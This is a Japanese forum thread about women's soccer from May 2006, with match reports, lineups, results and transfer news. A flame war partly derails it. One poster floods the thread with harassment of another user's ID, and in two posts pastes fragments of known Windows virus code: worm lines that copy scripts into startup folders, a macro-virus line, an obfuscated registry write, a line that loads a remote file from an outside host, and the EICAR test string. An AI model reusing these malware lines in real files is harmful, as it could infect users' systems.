74 :U-名無しさん:2006/05/06(土) 14:56:12 ID:CgqKAjCXO
熊本は控えのレベルがかなり上がってるんだぞー…(ぼそ

TM結果 熊本0−11熊本西高校♂(4月30日)
熊本0−0大分国体(今終わったとこ

75 :いつもの人:2006/05/06(土) 15:17:00 ID:ol4u+t3hO
伊賀、スコアレスからPK戦で勝利

76 :U-名無しさん:2006/05/06(土) 17:21:11 ID:JYACBTsHO
決勝の伊賀は確変だったのか、非常に力強かった
サブも実力が落ちない学生選抜はGK以外の交代枠8人をフルに使用
伊賀は11人で戦いぬいた
上位リーグ入りは東電、浦和と三つ巴じゃないかな

77 :U-名無しさん:2006/05/06(土) 20:14:18 ID:62KYYNEl0
福岡ー京都

福岡 GK平野、DF高木・藤・福原、MF阿比留・尾崎・鶴原
板谷・光成、FW谷原・花田
4−4−2で始まったと思いきや、数分後には3−4−1−2に
なっていた。システム変更したのか、自分が見間違えたのか?
メンバーは大幅に入れ替え。参考までに高槻戦はDF内堀・堤
鈴木・阿比留、MF深澤・河島・渋谷・川村、FW柏原・光成

京都は中盤フラットの4−4−2。GK達家、DF道下・加藤
須藤・下村、MF薬師寺・佐野・永吉・中田、FW矢田貝・天馬
ファンサイトでは永吉ではなく竹下になっているので登録変更で
プログラムと背番号が違っていたのかも。

福岡の2トップが昨日と人が代わって、自分から動かない。スペ
ースがないため後ろからの飛び出しも少なく中盤でパスを回すサ
ッカーになった。京都も似たようなもの。福岡の左DFは15才
の福原でプレーにとまどいがみられ、ここをスピードのある矢田
貝と右SHの薬師寺の2人が徹底的につけば面白かった、と思う
が。両チームとも「パスサッカー」というには相手を崩す力はな
く攻撃に精彩を欠いた。

78 :U-名無しさん:2006/05/06(土) 20:15:27 ID:62KYYNEl0
勝負をわけたのは守備意識。この試合の見所は守備に回った
時の福岡の集中力と粘り強さだった。戻りが早く、少し手数をか
けるとすぐに前線の選手が囲いこまれパスの出し所が無くなる。

先制のシーンは象徴的。開始数分で京都がサイドを破ってクロ
スFWにピタリとあうがなんとか防ぎ、こぼれ球をひろった選手を
囲ってボールを奪いクリア。直後、同じような展開で福岡がチャ
ンスをつかむ。こちらはマークを外した光成があっさり決める。
その後、膠着状態に。60分ごろ、クロスの競り合いに勝った渋
谷がもちこんで2点目。この時、他の京都DFがカバーにいかず
ボールウオッチャーになっていた。終了間際の3点目はおそらく
クロスが風でのびたもので、これは事故というしかない。

点差ほどに内容に大きな差はないが、小さくても明確な差はあ
る。そんな試合だった。

79 :U-名無しさん:2006/05/06(土) 20:16:06 ID:62KYYNEl0
伊賀ー学生選抜

学生選抜 中盤ボックス型の4−4−2 GK大友、DF堂下・田中
奥田・河上、MF那須・庭田・詫間・川澄、FW佐藤・堀田
伊賀は大体大戦と同じ。

去年のU-17も激しいチームだったが、学生選抜はそれ以上。協会は世
界のチームと戦うために、そういう意識付けをしているのだろう。
審判もちょっと倒れたくらいは流していた。伊賀の選手も負けずに対
抗してあちこちで肉弾戦となった。

ここでちょっと、お詫び。すいません、一日で前言撤回します。

伊賀の守備、ザルどころか結構堅い。経験のある山岸・馬場はもちろ
ん庄子も村上も身体張ってよく守っていた。大体大戦のもろさはチーム
全体が前ががりになり過ぎて相手にスペースを与えてしまったのが原因
で、それで守備陣に定評価を下したのは早計だった。

80 :U-名無しさん:2006/05/06(土) 20:17:19 ID:62KYYNEl0
見応えのある攻防が随所であったがスコアレスで決定機も少なかったの
で言葉での説明に困る。内容はほぼ互角。前半学生選抜が、後半は伊賀
がやや押していたか?

目だった選手は学生選抜は、庭田・那須のボランチコンビ。展開力に優
れ攻守ともに中心。ちなみに庭田は一番激しく(良い意味で)汚いプレ
ーをしていた。

伊賀は間違いなく鈴木。たえず周囲の敵味方の位置を把握していてパス
を受ける前に次のプレーのイメージができている。だからダイレクトパ
スを簡単に出せるし、ドリブルもスピードにのるまでが早い。キープす
る時も相手が奪いにくい場所にキチンと置く。何よりプレーに迷いがな
いのでみていて気持ちが良い。大会MVPに輝いたのは至極当然。
もっとも、そのおかげで近くの伊賀の選手が下手にみえたりもする。

結論 伊賀の8番に注目。クラブレベルでおさまる選手じゃない。早く
代表でみたい。

PS 表彰式、敢闘賞の4位の名古屋に「昨年は1勝もできず」って。
そんな事言ってやらんでも・・・。

81 :U-名無しさん:2006/05/06(土) 21:35:37 ID:qDcjb0qpO
>いつもの人
レポ乙です。

清原@伊賀と竹下@京都の背番号の件ですが、恐らく、
26番のユニがなかったため、欠場した選手のユニを借りて
試合に臨んだのではと推測します。
伊久間は知りませんが、永吉は京都のどの試合にも出ていない
どころか、会場でも姿を見掛けませんでした。

82 :U-名無しさん:2006/05/06(土) 23:10:15 ID:q5kkHzZF0
>>79
乙です。前言撤回、好感持てたよ。
忍びの里は、いつもピッチやベンチで見る選手や監督が
いつのまにか隣や背後の席にいたりして、あいさつや
情報交換を耳にすることが多かった。ちょっとした緊張
の連続だった。



83 :U-名無しさん:2006/05/06(土) 23:13:11 ID:JYACBTsHO
>>80
昨日までの学生選抜はクリーンだったので、伊賀が仕掛けたように思ったんだけど
審判はアバウトでしたね
久々に田口節が聞けましたw

>>81
京都の達家も、昨年までの27だった
清原は那須がユニ忘れたような気がするなw

84 :U-名無しさん:2006/05/07(日) 00:06:30 ID:zrCsHWsz0
伊賀の鈴木や新潟の上尾野辺は去年のユニバ選考の時、本田の○○でオーストラリアとの
親善試合に出してもらえなかった。
大学リーグでの実力は、折り紙つき!
MVPはもちろん納得!

85 :U-名無しさん:2006/05/07(日) 02:07:23 ID:rBoWLHKNO
>>84
本田さんは関係無いだろ
上手い選手を集めりゃチームとして機能する訳じゃないし
神大の鈴木は年初のユニバで見てるが、印象がないな
神大の出来が悪かった試合だからかも

86 :U-名無しさん:2006/05/07(日) 02:09:03 ID:rBoWLHKNO
>>85
ユニバじゃなくて、インカレ...失礼しました

87 :U-名無しさん:2006/05/07(日) 02:11:47 ID:aNBOpPC90
>>86
↓やっぱり的中wwwウソがバレて恥ずかしい奴www

78 名前:U-名無しさん[] 投稿日:2006/05/07(日) 02:08:33 ID:aNBOpPC90
こういうことわざわざ書く奴に限って今頃コソコソ覗いてるんだろうw
本当に寝るならいちいち報告する必要ないもんな。


88 :U-名無しさん:2006/05/07(日) 02:13:00 ID:w8e0jV4ZO
インカレ了解 さんきゅ
岡山国体 まさかの敗退と
ヤキが回ったか

89 :U-名無しさん:2006/05/07(日) 02:22:14 ID:aNBOpPC90
>>86の書き込み時間に注目。やっぱり寝てなかったウソツキ野郎w

あとウソがバレた途端に別人のふりして「スルーしよう」「無視しよう」とか擁護するのやめてねw

77 名前:U-名無しさん[] 投稿日:2006/05/07(日) 02:03:04 ID:rBoWLHKNO
>>76
間違いを正してやるのが粘着と言うなら粘着なんだろうなw

ま、お前にレスしてやるくらいの暇はあるが、もう寝るよw

78 名前:U-名無しさん[] 投稿日:2006/05/07(日) 02:08:33 ID:aNBOpPC90
こういうことわざわざ書く奴に限って今頃コソコソ覗いてるんだろうw
本当に寝るならいちいち報告する必要ないもんな。


90 :U-名無しさん:2006/05/07(日) 03:16:53 ID:9LyGiYUe0
前スレの510で案内した、第18回 西日本高等学校女子サッカー大会 結果
http://www.sportsonline.jp/report/rallyedit.asp?parentid=1660&mode=soccer

29校が参加していた模様。
このサイトでは、現時刻では予選リーグの結果しか載っていないが、
誠修高校系のブログによると、決勝トーナメントでの誠修の成績は、
1回戦 誠修 1-0 聖母
2回戦 誠修 1-1 (PK5-4) 啓明
準決勝 誠修 1-0 大商
決勝戦 誠修 1-2 鳳凰

とうことで、鳳凰高校が優勝。

91 :U-名無しさん:2006/05/07(日) 09:40:04 ID:yP5Gjg9l0
関東女子リーグ 14:00キックオフ 浦和レッズJrー日本体育大
レッズランド JR浦和駅 国際興行5番のりばバス 「下大久保」下車徒歩6分 さいたま市桜区下大久保1771

92 :U-名無しさん:2006/05/07(日) 10:09:05 ID:C7rcj/XzO
>>90
乙乙乙
結局そちらは観に行けなかったorz
その速報サイトはPCからでないと見られないようなので、
カフェ辺りで見てみる。

>>91
今日は1試合のみなのな>関東リーグ
観戦したら速報頼む、いや頼みます。

93 :U-名無しさん:2006/05/07(日) 10:30:15 ID:G4hH7JRwO
九州リーグも1試合あります。
熊本ユナイテッド-スカラブジュニア
熊本県民総合運動公園補助陸上競技場11:00

代表戦の会場のすぐ隣です。

ちなみに代表の方はすでに100人くらい並んでます。

94 :U-名無しさん:2006/05/07(日) 11:13:13 ID:aZqYZhTU0
小雨も止みつつある熊本開門
800人以上は並んでた。メインから続々埋まり中
パンフはないけど選手カラー写真入りリーフレットとブルーフラッグが無料配布
ピッチ看板はキリン、adidas、JAL、メナード、JA熊本、熊本県民共済、KKTくまもと県民テレビ

95 :U-名無しさん:2006/05/07(日) 11:29:24 ID:aZqYZhTU0
ルネサンスの選手が写真入り試合告知チラシ配ってます
スタンドは女子選手や代表ユニ着た人が多いです。
ブルーフラッグは試合日時がない。雨はやみました。

96 :U-名無しさん:2006/05/07(日) 12:16:54 ID:p7JD4Ino0
熊本、3000越えたかな。現在も観客続々詰め掛け中
小雨またふりだしました。照明も点灯。
アメリカ代表につづいてなでしこジャパンがピッチ練習開始
横断幕はベレーザ関連と、ウルトラアルデラス(ロッソ熊本サポ)

97 :U-名無しさん:2006/05/07(日) 12:24:44 ID:yHYolLXTO
ルネサンス熊本サポも来てるはずだが・・・・

98 :U-名無しさん:2006/05/07(日) 12:50:32 ID:6GsNMAHn0
とりあえず日本だけ
GK福元
DF磯崎 安藤 矢野
岩清水
MF酒井 澤 大野 宮間
FW大谷 永里


99 :U-名無しさん:2006/05/07(日) 12:53:44 ID:tm9zSsFs0
選手入ってきますた

100 :U-名無しさん:2006/05/07(日) 12:58:33 ID:ztosLpMu0
ずぶぬれだよーーー

101 :U-名無しさん:2006/05/07(日) 13:03:16 ID:jw1dg+py0
いきなりキター

102 :U-名無しさん:2006/05/07(日) 13:55:06 ID:G4hH7JRwO
>>97
呼んだか??www

とりあえず九州リーグ結果
熊本ユナイテッド5−0スカラブジュニア

103 :U-名無しさん:2006/05/07(日) 15:21:52 ID:0K62UPKQ0
       ☆ チン       
                  ____________
 ☆ チン  〃 ∧_∧   /
  ヽ ___\(\・∀・)< 大橋監督の更迭マダー??
      \_/⊂ ⊂_)_ \____________
    / ̄ ̄ ̄ ̄ ̄ ̄ ̄/|
   |  ̄  ̄ ̄ ̄ ̄ ̄ ̄:|  |
   |            .|/

104 :U-名無しさん:2006/05/07(日) 16:05:09 ID:1joUxSrp0
うは、四方姐じゃなくてイワシか (・∀・)


105 :U-名無しさん:2006/05/07(日) 17:02:35 ID:HElHp4Oi0
代表の対米国、主審は何人だったの?
酷い判定だったと聞きますた

106 :U-名無しさん:2006/05/07(日) 17:16:22 ID:WZbFv5Xn0
>>102
スカラブジュニアって、いつも無得点で負けてる印象があるんですけど、きっと気のせいですよね。

107 :U-名無しさん:2006/05/07(日) 17:17:54 ID:4V5LOxfK0
>>103
今日は主審に試合をぶっ壊されたからなぁ……

まぁ体格云々は最初から分かりきっていた訳だし
シーズン開幕前で怪我したくないのも有る

でも千葉or好調時の甲府並みにもっと走って欲しかったとは思う

108 :U-名無しさん:2006/05/07(日) 17:39:38 ID:C7rcj/XzO
真殿三加(1級主審)と長谷川芙沙子(2級主審)が、それぞれ
選手に戻って削り合うという、珍しい光景を見てきたw

109 :U-名無しさん:2006/05/07(日) 18:27:30 ID:wxDhlc+o0
人様のスレを荒らしてんじゃねえよ!!!!!!!



56 名前:U-名無しさん 投稿日:2006/05/06(土) 10:23:20 ID:JYACBTsHO
内容から判断したら、こちらが削除されるなw





110 :U-名無しさん:2006/05/07(日) 18:28:34 ID:wxDhlc+o0
荒らすのやめてもらえませんか?







63 名前:56 投稿日:2006/05/06(土) 17:33:02 ID:JYACBTsHO
55、57、58は俺じゃないし、そもそも、俺は熊本じゃないw
忍びの里に来てて携帯から書き込んでいるんで、他のスレ確認してみなよ>妄想乙















111 :U-名無しさん:2006/05/07(日) 18:29:53 ID:wxDhlc+o0
荒らしをお返しします













69 名前:U-名無しさん 投稿日:2006/05/06(土) 22:01:35 ID:JYACBTsHO
>>65
他の奴はしらねーよ
自演じゃないから当たり前だろw
とりあえず、最低2人は居たって事で、62の妄想ケッテーだよ














112 :U-名無しさん:2006/05/07(日) 18:31:30 ID:wxDhlc+o0
キモ荒らし晒しage





74 名前:69 投稿日:2006/05/07(日) 01:38:09 ID:rBoWLHKNO
>>71
伊賀の山奥の屋外でPCでモバイルと携帯か...何言っても無駄だなこりゃ
そこまで暇じゃないよw
だったら、最初から「出て来い」なんて書くなよw
歪んだとか煽りとか自分の事か?w
IP晒したり、削除依頼、根拠の無い因縁、先にやったのどっちだ?
俺は熊本じゃないけど旅行中なんで、家に帰ったら、ホントにPCから書き込みしてやるから、解析でも何でもやってみろよ

ちなみに、まともな書き込みは他のスレにやってるから、ノープロブレムだよ











113 :U-名無しさん:2006/05/07(日) 18:32:44 ID:wxDhlc+o0
なんで人様のスレを荒らすのか?





77 名前:U-名無しさん 投稿日:2006/05/07(日) 02:03:04 ID:rBoWLHKNO
>>76
間違いを正してやるのが粘着と言うなら粘着なんだろうなw

ま、お前にレスしてやるくらいの暇はあるが、もう寝るよw








114 :U-名無しさん:2006/05/07(日) 18:33:27 ID:wxDhlc+o0
荒らし晒しage








87 名前:U-名無しさん 投稿日:2006/05/07(日) 12:03:51 ID:rBoWLHKNO
>>82
基本的には同意なんだけど、やってもいない自演とか因縁つけてくるDQN(笑)がいるからねぇ
ま、このスレの主にはもう逆らわないよ
他のスレの平和の為にw








115 :U-名無しさん:2006/05/07(日) 18:33:47 ID:G4hH7JRwO
>>106
ちょいと去年のリーグ戦の成績を見てみたが…
3勝5分6敗、負け試合での得点はわずか1。
しかし10−0での勝利もある。
また、2位のアサヒナと引き分けたかと思えば、最下位の中津にも引き分ける、
はっきり言って、良く分からないチームですw

116 :U-名無しさん:2006/05/07(日) 18:34:28 ID:wxDhlc+o0
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける

117 :U-名無しさん:2006/05/07(日) 18:35:45 ID:wxDhlc+o0
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?
ID:rBoWLHKNOは何で荒らすの?

118 :U-名無しさん:2006/05/07(日) 18:36:28 ID:wxDhlc+o0
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける

119 :U-名無しさん:2006/05/07(日) 18:41:47 ID:wxDhlc+o0
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

120 :U-名無しさん:2006/05/07(日) 18:44:23 ID:wxDhlc+o0
ID:rBoWLHKNOはどうして毎日荒らしにくるの?

56 名前:U-名無しさん 投稿日:2006/05/06(土) 10:23:20 ID:JYACBTsHO
内容から判断したら、こちらが削除されるなw

63 名前:56 投稿日:2006/05/06(土) 17:33:02 ID:JYACBTsHO
55、57、58は俺じゃないし、そもそも、俺は熊本じゃないw
忍びの里に来てて携帯から書き込んでいるんで、他のスレ確認してみなよ>妄想乙

69 名前:U-名無しさん 投稿日:2006/05/06(土) 22:01:35 ID:JYACBTsHO
>>65
他の奴はしらねーよ
自演じゃないから当たり前だろw
とりあえず、最低2人は居たって事で、62の妄想ケッテーだよ

77 名前:U-名無しさん 投稿日:2006/05/07(日) 02:03:04 ID:rBoWLHKNO
>>76
間違いを正してやるのが粘着と言うなら粘着なんだろうなw

ま、お前にレスしてやるくらいの暇はあるが、もう寝るよw

87 名前:U-名無しさん 投稿日:2006/05/07(日) 12:03:51 ID:rBoWLHKNO
>>82
基本的には同意なんだけど、やってもいない自演とか因縁つけてくるDQN(笑)がいるからねぇ
ま、このスレの主にはもう逆らわないよ
他のスレの平和の為にw

ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける
ID:rBoWLHKNOが同じIDで出てきて謝罪しないかぎり続ける

121 :U-名無しさん:2006/05/07(日) 18:45:18 ID:4V5LOxfK0
本日のあぼーん推奨ID:rBoWLHKNO及びID:wxDhlc+o0

おまいら無視汁&カルシウム取れ!!!

122 :U-名無しさん:2006/05/07(日) 18:47:06 ID:wxDhlc+o0
>>121


ID:rBoWLHKNOが出てきて謝罪しないかぎり毎日続ける


毎日あぼーん登録するのか?




123 :U-名無しさん:2006/05/07(日) 18:49:16 ID:WBibphOu0
久々にあぼーん機能つかったよw

124 :U-名無しさん:2006/05/07(日) 18:49:44 ID:MCf9sz6jO
荒らすのも勝手だが、こんな中数少ない代表戦やってるんだもんな
おまいらがどれだけサッカーを愛していないDQNだかよくわかったよ

125 :U-名無しさん:2006/05/07(日) 18:51:16 ID:wxDhlc+o0




ID:rBoWLHKNO本人は携帯だからあぼーん機能使えないw


あぼーん機能を使おうが無駄にスレを消費してることには変わらないw





126 :U-名無しさん:2006/05/07(日) 18:52:44 ID:wxDhlc+o0
>>124


クラブ>>>>>代表


代表厨は代表板へ行け
つーか代表の時だけ沸いてくる奴らってw

127 :U-名無しさん:2006/05/07(日) 19:02:08 ID:wxDhlc+o0

ID:rBoWLHKNOが出てきて謝罪しないかぎり毎日続ける

If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub



128 :U-名無しさん:2006/05/07(日) 19:16:39 ID:Y3EAbDbp0
【なでしこ】<女子サッカー>日本代表、1―3で米代表に敗れる

http://news18.2ch.net/test/read.cgi/mnewsplus/1146996094/

129 :U-名無しさん:2006/05/07(日) 19:31:58 ID:1HGnqkE10
>>124
代表に関心がない≠サッカーを愛していない

自分は代表の話をしたい時は、代表板に行っている。ただそれだけ。



130 :U-名無しさん:2006/05/07(日) 19:34:08 ID:tL2XWXod0
なでしこリーグ開幕前に米国戦勝利ではずみをつけたかったんだがな。。
今日の敗戦は、もう仕方ないけど、水曜の試合はがんばってもらいたい。
多分、今日より厳しい試合になるだろうけど。
次も大敗したら、代表選手が多数出るスーパーカップへの関心が低下しか
ねないか心配だ。

131 :U-名無しさん:2006/05/07(日) 20:34:40 ID:K3yT0ht+0
>>116-118
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。




132 :U-名無しさん:2006/05/07(日) 21:00:34 ID:zXpjysWU0
>>131
同意。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。
BレーザのSわは、中指 を立てます。

133 :U-名無しさん:2006/05/07(日) 21:31:44 ID:J9nd41Ym0
ちょwwwwイワシが得点したの?


134 :U-名無しさん:2006/05/07(日) 21:43:03 ID:XtZ50dFPO
[sage]
本日の練習試合
アルビレディース 7−0 (4-0.3-0) 常盤木学園高校

135 :U-名無しさん:2006/05/07(日) 22:39:34 ID:WBibphOu0
やゆよタンのスレがああああああ
関連スレが落ちまくってるね

136 :U-名無しさん:2006/05/07(日) 23:07:44 ID:tL2XWXod0
おそらく一人のマルキのために貴重な情報交換の場が失われ
ようとしている。
2ちゃんに詳しい人、なんとかしてくれよ。。。

137 :U-名無しさん:2006/05/07(日) 23:59:44 ID:mpnKwGIr0
入団・移籍・退団情報久々更新。公式サイト発表分と補足分を追加。

L1
【東京電力】
(入団)小野俊介GM(JFA事業部)、西入俊浩GKコーチ(体教幼スポーツ学園講師)、
 DF村上今日子(聖和学園高)、宮崎有香(伊賀)、MF河田優(早稲田大)、
 上辻佑実(FC VITORIA)、FW鮫島彩(常盤木学園高) 
(退団)斎藤誠GM(未定)、MF遠原志穂美(未定)、小倉咲子(未定)

【浦和】
(入団・就任)永井良和監督(浦和ハートフルクラブコーチ)、井嶋正樹GKコーチ(JFAナショナルトレセンコーチ)
 DF柴田里美(武蔵丘短大)、百武江梨(神奈川大)、MF柳田美幸(TASAKI)
(退団・退任)坂庭泉監督(浦和ハートフルクラブコーチ復帰)、清水泰治コーチ
 (Jr.Yレディースコーチ就任)、FW槇寛美(未定)

【日テレ】
(入団・就任)DF佐藤芽衣(日テレメニーナ)、MF原菜摘子(日テレメニーナ、二重登録)
(退団・退任)菊地新吉GKコーチ(東京VGKコーチ就任)、DF戸崎有紀(現役引退、
 スクールコーチ就任)

【伊賀】
